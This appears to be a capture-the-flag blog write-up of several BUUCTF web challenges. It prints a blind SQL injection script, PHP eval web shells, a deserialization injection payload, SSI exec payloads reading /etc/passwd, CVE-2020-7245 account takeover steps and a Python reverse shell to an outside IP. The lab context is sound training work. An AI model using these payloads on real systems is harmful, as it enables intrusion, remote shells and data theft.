BUUCTF WEB (2020-April to brush questions~)

u1s1, I really don't know what to do these days; I don't feel like studying, and I can't stop being addicted to MC!!

[CISCN2019 Finals Day2 Web1]Easyweb

Visiting the page, I found a login box. Check the source code.
There is an image.php page with an id parameter, so SQL injection is suspected, but nothing happens.
Later I found a robots.txt.
Downloading index.php.bak gives nothing useful; downloading image.php.bak gives the source code of image.php:

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

You can see that our parameters are first escaped with addslashes, and then single quotes, \0 and so on are filtered out; no wonder nothing happened before.
Looking closer, this does not stop us from performing SQL injection.
Pass the parameters:

id=\\0'&path= or 1=1#
<?php

$id = "\\0";
$path = " or 1=1 #";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

echo "select * from images where id='{$id}' or path='{$path}'";

Result:
select * from images where id='\' or path=' or 1=1 #'

This way the where condition is defeated, and we can inject. Write a script:

import requests
import sys
import io


sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8')  # change the default encoding of stdout, otherwise r.text cannot be printed
flag = ""

url = "http://1ecf7701-7fa0-409e-8a5a-176be2cb62a3.node3.buuoj.cn/image.php?id=\\0&path= or ascii(substr((select password from users),%s,1)) < %s"

'''
r = requests.get(url)
if "JFIF" in r.text:
    print("Good!")
'''

# Boolean-based blind injection: a valid image (JFIF header) means the condition was true
for i in range(1, 100):
    for j in range(1, 126):
        urls = url % (str(i), str(j)) + " %23"
        r = requests.get(urls)
        if "JFIF" in r.text:
            flag += chr(j - 1)
            print(flag)
            break
print(flag)

Get the password.
Log in as admin.
PHP files can't be uploaded; change to another extension, get a link and visit it.
You can see that our file name is recorded in the PHP file!
Then we can change the file name to a PHP statement!! Found that it doesn't work; presumably the php keyword is filtered.
So PHP syntax can't be used? No, use the short tag: <?=$_GET['cmd']; eval($_POST['cmd']); ?>
Chopper link:

[安洵杯2019]easy_serialize_php

Deserialization character escape. Different from the previous one, this one uses keyword filtering, that is, the string gets shorter. Open the challenge and you can see the source code:

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

Open phpinfo as the hint suggests and you can see the flag file name, so we are meant to read the flag from that file.
The key element is img, so we need to control img.
Notice the extract($_POST); line, which lets us construct a new session value:

$_SESSION['flagphp']=';s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

You can write your own code and run it to see the result:

<?php
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

$_SESSION['flagphp']=';s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');

$serialize_info = filter(serialize($_SESSION));
echo $serialize_info."\n";

$b = unserialize($serialize_info);
echo $b['img'];

Result:
a:2:{s:7:"";s:50:";s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
ZDBnM19mMWFnLnBocA==

As you can see, the img we got is the one we passed in, so this works. Reading that file shows there is still another file; read it as well to get the flag.
The final payload for the flag:

GET
f=show_image
POST
_SESSION['flagphp']=;s:3:"333";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
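To make the length mismatch concrete, here is an added example (not the challenge's code) using a minimal Python stand-in for PHP's serialize()/unserialize() that covers only flat arrays of strings. It replays the payload above through the same filter, and filter_before_serialize shows the fix of sanitizing the data before serializing it.

```python
import re

FILTER = re.compile(r"php|flag|php5|php4|fl1g", re.I)  # same list as index.php

def php_serialize(arr):
    body = "".join(f's:{len(k)}:"{k}";s:{len(v)}:"{v}";' for k, v in arr.items())
    return f"a:{len(arr)}:{{{body}}}"

def php_unserialize(blob):
    """Like PHP: trust each declared length, read exactly that many chars,
    then require the closing '";'. Data after the final '}' is ignored."""
    head = re.match(r"a:(\d+):\{", blob)
    if not head:
        raise ValueError("not a serialized array")
    pos = head.end()
    def read_str():
        nonlocal pos
        m = re.compile(r's:(\d+):"').match(blob, pos)
        if not m:
            raise ValueError(f"expected a string at offset {pos}")
        start, n = m.end(), int(m.group(1))
        if blob[start + n:start + n + 2] != '";':
            raise ValueError(f"declared length {n} does not match at {start}")
        pos = start + n + 2
        return blob[start:start + n]
    out = {}
    for _ in range(int(head.group(1))):
        key = read_str()
        out[key] = read_str()
    if blob[pos:pos + 1] != "}":
        raise ValueError("missing closing brace")
    return out

def filter_after_serialize(session):
    # index.php's order: 'flagphp' shrinks to 0 chars but its s:7 header stays, so
    # 7 chars of the next field ('";s:50:') become the key and the payload is parsed as structure.
    return php_unserialize(FILTER.sub("", php_serialize(session)))

def filter_before_serialize(session):
    # Fix: sanitize the data first, then serialize, so every declared length
    # describes the characters that are actually emitted.
    clean = {FILTER.sub("", k): FILTER.sub("", v) for k, v in session.items()}
    return php_unserialize(php_serialize(clean))

# Constructed input mirroring the writeup's POST (img is base64 of guest_img.png).
SESSION = {
    "flagphp": ';s:3:"333";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}',
    "img": "Z3Vlc3RfaW1nLnBuZw==",
}
```

With the filter applied after serializing, img comes back as the attacker's base64; with the filter applied first, the injected string stays an ordinary value and img is still guest_img.png.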

[GXYCTF2019]BabyUpload

An upload interface. Try uploading and find that files with a ph suffix can't be uploaded.
Try uploading .htaccess and find that the upload succeeds.
Upload the image shell; for convenience use <script language=php> directly.
Then readfile the flag file directly.

[BJDCTF2020]EasySearch

Scan and find the .swp file; visit it to get the source code:

<?php
    ob_start();
    function get_hash(){
        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random;
        return sha1($content); 
    }
    header("Content-Type: text/html;charset=utf-8");
    ***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
            ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
        }
    }else
    {
        ***
    }
    ***
?>

You can see that the username can be anything; as long as the first 6 characters of the md5 of the password equal 6d0bc1, you can log in.
After logging in, the username is written into a randomly named shtml file~~
Searching for shtml-related vulnerabilities turns up SSI injection. OK.
First brute-force the password; this one should be fairly simple:

import hashlib

def getMd5(index):
    # search for a number whose md5 starts with the given 6-character prefix
    for i in range(10000, 100000000):
        x = i
        md5 = hashlib.md5(str(x).encode("utf8")).hexdigest()
        if md5[0:6] == index:
            print(x)
            print(md5)
            return x

getMd5("6d0bc1")

Get 2020666, then perform SSI injection via the username:

Directly execute arbitrary programs on the server with <#exec> (such as CGI or other executables):
<!--#exec cmd="cat /etc/passwd"-->

After writing the command you want to execute, visit the shtml file.
payload:

<!--#exec cmd="ls ../"-->

Visit flag_990c66bf85a09c664f0b6741840499b2 to get the flag.

[V&N2020 Open]HappyCTFd

For this challenge, when I tried the CVE my mailbox didn't work, so I just gave up at the time; you need a mailbox on the buu intranet. It is a reproduction of CVE-2020-7245.
Principle: CVE-2020-7245 user takeover.
Open the challenge and first register a user. Following the principle, register admin with a space in front of admin, and register the email: [email protected]
Then log out, click Reset the password on the login page, and enter the email.
Once you receive the email you can change the password, but note that before logging in you must first change the username of the account you registered directly.
After admin's password has been changed, go straight in and find the flag.
Download the file to get the flag~~

[V&N2020 Open] CHECKIN

Open to get the source code:

from flask import Flask, request
import os
app = Flask(__name__)

flag_file = open("flag.txt", "r")
# flag = flag_file.read()
# flag_file.close()
#
# @app.route('/flag')
# def flag():
#     return flag
## want flag? naive!

# You will never find the thing you want:) I think
@app.route('/shell')
def shell():
    os.system("rm -f flag.txt")
    exec_cmd = request.args.get('c')
    os.system(exec_cmd)
    return "1"

@app.route('/')
def source():
    return open("app.py","r").read()

if __name__ == "__main__":
    app.run(host='0.0.0.0')

You can see that we can execute commands, but before our command runs the flag file is deleted,
and there is no output after the command executes. Let's try a reverse shell first. Since this is Python, just use a Python one-liner reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.0.130.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After passing it in, listen with nc on your own machine (a buu intranet machine), and we get a shell, but find that we have no permission to read, so
here a new knowledge point needs to be introduced:

On a Linux system, if a program opens a file and does not close it, then even after the file is deleted externally, its file descriptor still exists in the fd directory under that process's /proc/<pid> directory, and through it we can obtain the content of the deleted file.

Since the flag file is opened above but never closed, we can read it from the fd directory under the process's /proc/<pid> directory, using the command:

cat /proc/*/fd/*

Get the flag.
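As an added example (not the writeup's own code), the following Python script reproduces the mechanism on a constructed temp file: after unlink the path is gone, but the content is still readable through the open descriptor and through /proc/self/fd, which is exactly what the cat command above relies on.

```python
import os
import tempfile

# Why "rm -f flag.txt" in app.py does not destroy the data: a file that some
# process still holds open stays readable through that process's
# /proc/<pid>/fd/<n> entry until the last descriptor is closed.
PROC_FD_DIR = "/proc/self/fd"
PROC_AVAILABLE = os.path.isdir(PROC_FD_DIR)   # Linux only; skipped elsewhere

def recover_deleted_open_file(content):
    """Write `content` to a temp file, open it, unlink it, then read it back
    through the open descriptor and (on Linux) through /proc/self/fd."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "flag.txt")
    with open(path, "wb") as f:
        f.write(content)
    fd = os.open(path, os.O_RDONLY)       # like open("flag.txt", "r") in app.py
    try:
        os.unlink(path)                   # like os.system("rm -f flag.txt")
        result = {"path_exists": os.path.exists(path),        # False: the name is gone
                  "via_fd": os.pread(fd, len(content), 0)}    # ...but the inode is not
        if PROC_AVAILABLE:
            link = f"{PROC_FD_DIR}/{fd}"
            # The kernel marks the magic symlink of an unlinked target "(deleted)";
            # this is what shows up when listing /proc/<pid>/fd on the server.
            result["proc_link_marked_deleted"] = os.readlink(link).endswith("(deleted)")
            with open(link, "rb") as g:   # same as cat /proc/<pid>/fd/<n>
                result["via_proc"] = g.read()
    finally:
        os.close(fd)                      # after this the content is unreachable
        os.rmdir(tmpdir)
    return result

if __name__ == "__main__":
    print(recover_deleted_open_file(b"flag{constructed_sample}\n"))
```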

Origin blog.csdn.net/qq_42967398/article/details/105578261